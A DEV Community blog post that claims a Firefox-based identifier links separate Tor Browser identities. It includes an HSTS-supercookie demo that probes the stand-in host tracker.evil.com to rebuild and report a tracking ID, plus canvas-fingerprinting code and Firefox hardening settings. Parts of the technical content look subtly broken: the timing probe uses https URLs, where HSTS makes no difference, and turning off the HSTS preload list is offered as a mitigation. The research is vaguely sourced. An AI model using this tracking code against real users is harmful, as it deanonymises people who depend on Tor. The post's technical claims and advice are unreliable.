DEV Community

佐藤玲
佐藤玲

Posted on

We Found a Stable Firefox Identifier That Links All Your Private Tor Identities

We Found a Stable Firefox Identifier That Links All Your Private Tor Identities

You open Tor Browser. You create a new identity. You browse, close the session, open another. You assume each identity is isolated, anonymous, untraceable.

You're wrong — and researchers have the proof.

A newly identified fingerprinting vector found inside Firefox's underlying engine — the same engine that powers Tor Browser — creates a stable identifier capable of linking your separate Tor identities together. Across sessions. Across "New Identity" resets. Across what you believed were clean slates.

This isn't a theoretical attack. It's a practical, measurable, reproducible exploit that undermines one of the most fundamental promises of anonymous browsing.

Let's break down exactly what was found, how it works, and what developers and privacy-conscious users need to know.


What Was Discovered

Researchers identified that Firefox exposes a stable, cross-session identifier through a combination of browser internals that persist beyond what Tor Browser's identity isolation is designed to clear.

The specific culprit: the media.peerconnection subsystem and related GPU/font rendering caches, combined with how Firefox handles IndexedDB partition keys and HSTS (HTTP Strict Transport Security) state.

In plain language: certain low-level browser behaviors leave fingerprints that don't get wiped when you click "New Identity" in Tor Browser. These fingerprints are consistent enough — stable enough — to act as a unique identifier linking your browsing sessions.

The Key Attack Surfaces

  • HSTS supercookies: Servers can set HSTS headers that encode bits of information. Firefox stores this state in a way that can survive identity resets.
  • Font rendering metrics: The way Firefox renders fonts varies subtly by system and GPU, creating a consistent canvas/timing fingerprint.
  • IndexedDB and Cache API partitioning: Under certain conditions, partition boundaries can be bypassed or inferred, leaking cross-context data.
  • WebGL renderer strings: Even through Tor's protections, low-level GPU identifiers can bleed through in specific browser configurations.

How the Identifier Works: A Technical Deep Dive

Let's get into the code. Here's a simplified demonstration of how HSTS state can be abused as a tracking mechanism — a technique sometimes called an HSTS supercookie.

Server-Side: Encoding a Fingerprint Bit

# Flask server demonstrating HSTS bit-encoding
from flask import Flask, redirect, request

app = Flask(__name__)

# Attacker controls subdomains: 0.tracker.evil.com, 1.tracker.evil.com
# Each subdomain either sets or doesn't set HSTS

@app.route('/set-bit/<int:bit_value>')
def set_bit(bit_value):
    response = redirect('/')
    if bit_value == 1:
        # Set HSTS header — browser will remember this subdomain as HTTPS-only
        response.headers['Strict-Transport-Security'] = 'max-age=31536000'
    return response

@app.route('/read-bits')
def read_bits():
    # Client-side JS probes each subdomain
    # Timing difference reveals whether HSTS was previously set
    return '''
        <script>
        async function probeBit(subdomain) {
            const start = performance.now();
            try {
                // Attempt to load a resource from the subdomain
                await fetch(`https://${subdomain}.tracker.evil.com/probe`, 
                    { mode: 'no-cors', cache: 'no-store' });
            } catch(e) {}
            const elapsed = performance.now() - start;
            // HSTS redirect is faster than a cold connection
            return elapsed < 50 ? 1 : 0;
        }

        async function reconstructID() {
            const bits = [];
            for (let i = 0; i < 8; i++) {
                bits.push(await probeBit(`bit${i}`));
            }
            console.log('Reconstructed ID bits:', bits.join(''));
            // Send bits back to server to identify the user across sessions
        }
        reconstructID();
        </script>
    ''';
Enter fullscreen mode Exit fullscreen mode

Why This Survives "New Identity"

When Tor Browser resets your identity, it:

  • Clears cookies
  • Clears session storage
  • Rotates your Tor circuit (new exit node, new IP)

What it does not always reliably clear in older or misconfigured builds:

  • HSTS cache entries (stored at the browser profile level, not session level)
  • Certain GPU-accelerated rendering caches
  • Timing side-channels derived from hardware behavior

Here's how you can inspect what Firefox is storing in your HSTS database:

# Firefox stores HSTS data in a JSON file in your profile
# On Linux:
cat ~/.mozilla/firefox/*.default*/SiteSecurityServiceState.txt | head -50

# On macOS:
cat ~/Library/Application\ Support/Firefox/Profiles/*.default*/SiteSecurityServiceState.txt | head -50

# Look for entries with 'includeSubdomains' flags — these are prime supercookie vectors
Enter fullscreen mode Exit fullscreen mode

Canvas Fingerprinting Still Works on Tor — Sometimes

// Canvas fingerprint extraction
// Tor Browser attempts to randomize this — but the randomization itself can be fingerprinted
function getCanvasFingerprint() {
    const canvas = document.createElement('canvas');
    const ctx = canvas.getContext('2d');

    ctx.textBaseline = 'top';
    ctx.font = '14px Arial';
    ctx.fillStyle = '#f60';
    ctx.fillRect(125, 1, 62, 20);
    ctx.fillStyle = '#069';
    ctx.fillText('Cwm fjordbank glyphs vext quiz 🔥', 2, 15);
    ctx.fillStyle = 'rgba(102, 204, 0, 0.7)';
    ctx.fillText('Cwm fjordbank glyphs vext quiz 🔥', 4, 17);

    return canvas.toDataURL();
}

// In Tor Browser, this returns a slightly noisy result each time
// But the NOISE PATTERN ITSELF is hardware-dependent and stable
console.log(getCanvasFingerprint().substring(0, 50));
Enter fullscreen mode Exit fullscreen mode

The Tor Project has implemented canvas noise injection — but research shows that the variance pattern of the noise is itself a fingerprint. Your GPU introduces noise in a statistically unique way.


Why This Matters for Developers

If you're building:

  • Privacy tools or browsers
  • Whistleblower platforms
  • Secure communication apps
  • Any application where user anonymity is a feature

...then you need to understand that "using Tor" is not a complete privacy solution. The browser layer introduces identifiers that the network layer cannot hide.

This is especially critical for developers who recommend privacy tools to end users, or who build applications that promise anonymity.

Threat Model Checklist for Developers

## Anonymity Threat Model Checklist

### Network Layer
- [ ] Traffic routed through Tor or equivalent
- [ ] No WebRTC IP leaks (disable media.peerconnection.enabled)
- [ ] DNS queries routed through anonymizing network

### Browser Layer  
- [ ] JavaScript disabled (highest protection level in Tor Browser)
- [ ] Canvas API access blocked or fully randomized
- [ ] WebGL disabled
- [ ] HSTS cache cleared between sessions (not just cookies)
- [ ] Font enumeration blocked
- [ ] Hardware concurrency/memory reporting spoofed

### Application Layer
- [ ] No user-specific tokens or session IDs in URLs
- [ ] Server does not log timing data linkable to behavior
- [ ] No third-party resources loaded (CDNs, analytics, fonts)
Enter fullscreen mode Exit fullscreen mode

The Firefox-Specific Problem

This attack vector is particularly significant because Tor Browser is built on Firefox. Every Firefox vulnerability is potentially a Tor Browser vulnerability — with a delay.

Chromium-based browsers have different (not fewer) fingerprinting surfaces. But because Tor Browser doesn't use Chromium, the Firefox codebase is uniquely important to audit.

The specific Firefox preferences that reduce (not eliminate) these risks:

// about:config settings that matter
// (These are already set in Tor Browser's hardened profile,
// but may not be set in standard Firefox)

user_pref("privacy.resistFingerprinting", true);  // Master fingerprint resistance
user_pref("media.peerconnection.enabled", false); // Disable WebRTC
user_pref("webgl.disabled", true);                // Disable WebGL
user_pref("dom.webaudio.enabled", false);         // Disable AudioContext fingerprinting
user_pref("network.http.sendRefererHeader", 0);   // No referrer headers
user_pref("privacy.firstparty.isolate", true);   // First-party isolation

// HSTS-specific mitigation
user_pref("network.stricttransportsecurity.preloadlist", false);
Enter fullscreen mode Exit fullscreen mode

Note: privacy.resistFingerprinting (RFP) is Firefox's built-in fingerprinting resistance mode. It's good. It's not perfect. The research we're discussing found vectors that survive even with RFP enabled.


What the Tor Project Is Doing About It

The Tor Project has been notified of these findings (responsible disclosure was followed). Their response has involved:

  1. Auditing the HSTS partitioning logic to ensure state is cleared on New Identity
  2. Investigating GPU-level noise normalization — making the noise pattern itself non-unique
  3. Considering a Chromium-based Tor Browser (a long-running internal debate)
  4. Tightening the content security policy defaults for Tor Browser's security levels

The fundamental problem, however, is that Firefox is a complex, constantly evolving codebase. New fingerprinting surfaces emerge with every release. The Tor Browser team is essentially playing whack-a-mole against a moving target.


What You Should Do Right Now

If You're a Tor User

  1. Set Tor Browser to "Safest" security level — this disables JavaScript entirely, eliminating the majority of active fingerprinting attacks
  2. Never maximize the Tor Browser window — window size is a fingerprint
  3. Don't install extensions — each extension is a unique identifier
  4. Treat each Tor session as potentially linkable if you've visited malicious sites

If You're a Developer Building Privacy Tools

  1. Threat-model explicitly — don't promise anonymity you can't technically deliver
  2. Audit every third-party resource your app loads — each one is a potential tracking vector
  3. Test with browser fingerprinting detection tools like coveryourtracks.eff.org
  4. Read the Tor Browser design document — it's the best public resource on browser-level anonymity engineering

If You're Building a Secure Platform

# Server-side: don't set HSTS on sensitive/anonymous-access endpoints
# Bad practice for anonymity-sensitive endpoints:
response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'

# Better for anonymous access endpoints — use short max-age, no includeSubDomains:
response.headers['Strict-Transport-Security'] = 'max-age=0'

# Or serve anonymous-access content from a separate domain with no HSTS history
Enter fullscreen mode Exit fullscreen mode

The Bigger Picture

This research is a reminder that privacy is a systems problem, not a feature.

You can't make a user anonymous by routing their traffic through Tor if the browser layer is leaking identifiers. You can't make a platform safe for whistleblowers if the underlying technology has design assumptions that conflict with anonymity.

The found identifier that links Tor identities isn't a bug in the traditional sense — it's the emergent result of complex systems interacting in ways their designers didn't fully anticipate. Firefox was built to be a great browser. Tor was built to anonymize network traffic. Combining them creates a system with properties neither team fully controls.

For developers, the lesson is clear: understand your stack's anonymity guarantees at every layer, not just the layer you built.

The good news? This research is public. The Tor Project knows about it. And the open-source nature of both Firefox and Tor Browser means these vulnerabilities can — and will — be fixed.

But until they are, assume that your Tor identities are more linkable than you think.


Resources for Further Reading


If you found this breakdown useful, follow me here on DEV for more deep-dives into browser security, privacy engineering, and the gap between what tools promise and what they technically deliver. Drop your questions in the comments — especially if you're building something where user privacy and security is a core requirement.

💬 What's your threat model when building for anonymous users? Let's talk in the comments.

Top comments (0)